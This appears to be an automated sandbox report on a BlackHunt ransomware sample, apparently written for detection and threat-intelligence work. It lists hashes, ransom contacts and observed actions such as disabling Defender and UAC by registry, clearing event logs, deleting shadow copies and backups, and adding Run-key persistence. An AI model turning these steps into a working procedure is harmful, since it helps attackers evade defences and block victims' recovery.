Analysis
max time kernel: 91s
max time network: 106s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26-12-2022 10:59
Static task: static1
Behavioral task: behavioral1
  Sample: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  Resource: win10v2004-20220901-en
General
Target: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Size: 718KB
MD5: d7a24de75b761cb98f580dafda4ba885
SHA1: 86dc51cfc817937f9525b8aa2fa71e918288a44d
SHA256: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f
SHA512: c3fd50a296b4d251a614816756eb17632779c0ef0e72826d9d276ccae8b1689ca0523a22027509ce20bf125f858f713b08967ae55501c457bc9d8fca956b0e9e
SSDEEP: 12288:YuLRIEFPULfzlsH5HCSSv5zEWptZ/Vlt:YeRIEF6zlsu5AWptRVlt
Malware Config
Extracted
  Path: C:\ProgramData\#BlackHunt_ReadMe.hta
  Emails: amike1096@gmail.com, onion746@onionmail.com
  URL: http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
Processes:
  pid   process
  1016  fsutil.exe
  5108  fsutil.exe

Processes:
  description      | ioc | process
  Key created      | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
  Set value (int)  | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe

Processes:
  description      | ioc | process
  Set value (int)  | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Clears Windows event logs (1 TTPs, 5 IoCs)
Processes:
  pid   process
  3748  wevtutil.exe
  1192  wevtutil.exe
  4404  wevtutil.exe
  3032  wevtutil.exe
  2348  wevtutil.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
Processes:
  pid   process
  2060  bcdedit.exe
  2528  bcdedit.exe
  2876  bcdedit.exe
  5004  bcdedit.exe

Processes:
  pid   process
  5072  wbadmin.exe
  3772  wbadmin.exe
Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  description        | ioc | process
  Key value queried  | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | cmd.exe
  Key value queried  | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Adds Run key to start application (2 TTPs, 4 IoCs)
Processes:
  description      | ioc | process
  Key created      | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str)  | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe
  Key created      | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str)  | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityService = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " | reg.exe

Processes:
  description      | ioc | process
  Set value (int)  | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description              | ioc    | process
  File opened (read-only)  | \??\A: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\G: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\K: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\Q: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\T: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\Y: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\B: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\N: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\M: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\O: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\J: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\V: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\Z: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\X: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\M: | fsutil.exe
  File opened (read-only)  | \??\W: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\R: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\U: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\S: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\F: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\H: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\L: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\E: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\I: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  File opened (read-only)  | \??\P: | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  4     ip-api.com
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes:
  description      | ioc | process
  Set value (str)  | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Drops file in Program Files directory (64 IoCs)
Processes:
  process for every row below: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  description                 | ioc
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar
  File created                 | C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_AddBlue@1x.png
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\ui-strings.js
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#BlackHunt_ReadMe.hta
  File opened for modification | C:\Program Files\7-Zip\Lang\gl.txt
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar
  File created                 | C:\Program Files\VideoLAN\VLC\lua\meta\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac
  File opened for modification | C:\Program Files\VideoLAN\VLC\VideoLAN Website.url
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_18.svg
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\#BlackHunt_ReadMe.hta
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer
  File created                 | C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#BlackHunt_ReadMe.txt
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ar-ae\#BlackHunt_ReadMe.hta
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#BlackHunt_ReadMe.hta
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\#BlackHunt_Private.key
  File created                 | C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#BlackHunt_Private.key
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\#BlackHunt_Private.key
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\#BlackHunt_Private.key
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansDemiBold.ttf
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-sl\#BlackHunt_ReadMe.txt
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#BlackHunt_ReadMe.txt
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\#BlackHunt_Private.key
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#BlackHunt_ReadMe.hta
  File created                 | C:\Program Files (x86)\Common Files\Services\#BlackHunt_Private.key
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\en-US.pak
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\ui-strings.js
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js
  File created                 | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#BlackHunt_Private.key
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml
  File created                 | C:\Program Files (x86)\Google\CrashReports\#BlackHunt_ReadMe.txt
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#BlackHunt_ReadMe.txt
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\#BlackHunt_Private.key
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N.svg
  File created                 | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#BlackHunt_ReadMe.hta
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\#BlackHunt_ReadMe.hta
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\ui-strings.js
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#BlackHunt_ReadMe.txt
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\#BlackHunt_ReadMe.txt
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\#BlackHunt_ReadMe.hta
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg
  File created                 | C:\Program Files\VideoLAN\VLC\lua\http\images\#BlackHunt_ReadMe.txt
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#BlackHunt_ReadMe.txt
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\#BlackHunt_Private.key
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\#BlackHunt_ReadMe.hta
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar
  File created                 | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#BlackHunt_Private.key
  File created                 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#BlackHunt_ReadMe.txt
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description        | ioc | process
  Key opened         | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
  Key value queried  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
  Key opened         | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
  Key value queried  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Interacts with shadow copies (2 TTPs, 2 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  pid   process
  476   vssadmin.exe
  4168  vssadmin.exe

Kills process with taskkill (1 IoCs)
Processes:
  pid   process
  4532  taskkill.exe

Modifies registry class (9 IoCs)
Processes:
  description      | ioc | process
  Key created      | \REGISTRY\MACHINE\Software\Classes\Black | reg.exe
  Set value (str)  | \REGISTRY\MACHINE\SOFTWARE\Classes\Black\ | reg.exe
  Key created      | \REGISTRY\MACHINE\Software\Classes\.Black\DefaultIcon | reg.exe
  Key created      | \REGISTRY\MACHINE\Software\Classes\Black\DefaultIcon | reg.exe
  Key created      | \REGISTRY\MACHINE\Software\Classes\.Black | reg.exe
  Set value (str)  | \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\ | reg.exe
  Key created      | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | cmd.exe
  Set value (str)  | \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
  Set value (str)  | \REGISTRY\MACHINE\SOFTWARE\Classes\Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid   process
  4848  f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  4848  f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes:
  pid   process
  4848  f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Suspicious use of AdjustPrivilegeToken (17 IoCs)
Processes:
  description                 | pid   | process
  Token: SeBackupPrivilege    | 3992  | vssvc.exe
  Token: SeRestorePrivilege   | 3992  | vssvc.exe
  Token: SeAuditPrivilege     | 3992  | vssvc.exe
  Token: SeBackupPrivilege    | 4116  | wbengine.exe
  Token: SeRestorePrivilege   | 4116  | wbengine.exe
  Token: SeSecurityPrivilege  | 4116  | wbengine.exe
  Token: SeSecurityPrivilege  | 3748  | wevtutil.exe
  Token: SeBackupPrivilege    | 3748  | wevtutil.exe
  Token: SeSecurityPrivilege  | 1192  | wevtutil.exe
  Token: SeBackupPrivilege    | 1192  | wevtutil.exe
  Token: SeSecurityPrivilege  | 4404  | wevtutil.exe
  Token: SeBackupPrivilege    | 4404  | wevtutil.exe
  Token: SeSecurityPrivilege  | 3032  | wevtutil.exe
  Token: SeBackupPrivilege    | 3032  | wevtutil.exe
  Token: SeSecurityPrivilege  | 2348  | wevtutil.exe
  Token: SeBackupPrivilege    | 2348  | wevtutil.exe
  Token: SeDebugPrivilege     | 4532  | taskkill.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
  description                       | pid   | process | target process
  PID 4848 wrote to memory of 2284  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 2284  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 64    | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 64    | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 1908  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 1908  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 2284 wrote to memory of 3756  | 2284  | cmd.exe | reg.exe
  PID 2284 wrote to memory of 3756  | 2284  | cmd.exe | reg.exe
  PID 4848 wrote to memory of 1756  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 1756  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 4244  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 4244  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 1908 wrote to memory of 5068  | 1908  | cmd.exe | reg.exe
  PID 1908 wrote to memory of 5068  | 1908  | cmd.exe | reg.exe
  PID 4848 wrote to memory of 5084  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 5084  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 64 wrote to memory of 4616    | 64    | cmd.exe | reg.exe
  PID 64 wrote to memory of 4616    | 64    | cmd.exe | reg.exe
  PID 4848 wrote to memory of 4460  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 4460  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 1284  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 1284  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 1756 wrote to memory of 1740  | 1756  | cmd.exe | reg.exe
  PID 1756 wrote to memory of 1740  | 1756  | cmd.exe | reg.exe
  PID 4848 wrote to memory of 2944  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 2944  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4244 wrote to memory of 1840  | 4244  | cmd.exe | reg.exe
  PID 4244 wrote to memory of 1840  | 4244  | cmd.exe | reg.exe
  PID 5084 wrote to memory of 4688  | 5084  | cmd.exe | reg.exe
  PID 5084 wrote to memory of 4688  | 5084  | cmd.exe | reg.exe
  PID 4848 wrote to memory of 5112  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 5112  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 1348  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 1348  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4460 wrote to memory of 4800  | 4460  | cmd.exe | reg.exe
  PID 4460 wrote to memory of 4800  | 4460  | cmd.exe | reg.exe
  PID 2944 wrote to memory of 4148  | 2944  | cmd.exe | reg.exe
  PID 2944 wrote to memory of 4148  | 2944  | cmd.exe | reg.exe
  PID 4848 wrote to memory of 536   | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 536   | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 4260  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 4260  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 1284 wrote to memory of 2876  | 1284  | cmd.exe | reg.exe
  PID 1284 wrote to memory of 2876  | 1284  | cmd.exe | reg.exe
  PID 1348 wrote to memory of 4768  | 1348  | cmd.exe | reg.exe
  PID 1348 wrote to memory of 4768  | 1348  | cmd.exe | reg.exe
  PID 4848 wrote to memory of 4884  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 4884  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 5072  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 5072  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 5112 wrote to memory of 3532  | 5112  | cmd.exe | reg.exe
  PID 5112 wrote to memory of 3532  | 5112  | cmd.exe | reg.exe
  PID 4848 wrote to memory of 440   | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 440   | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 60    | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 60    | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 536 wrote to memory of 5096   | 536   | cmd.exe | reg.exe
  PID 536 wrote to memory of 5096   | 536   | cmd.exe | reg.exe
  PID 4848 wrote to memory of 4960  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 4960  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 1000  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 4848 wrote to memory of 1000  | 4848  | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe | cmd.exe
  PID 5072 wrote to memory of 4144  | 5072  | cmd.exe | reg.exe
  PID 5072 wrote to memory of 4144  | 5072  | cmd.exe | reg.exe
System policy modification (1 TTPs, 3 IoCs)
Processes:
  description      | ioc | process
  Key created      | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  Set value (int)  | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
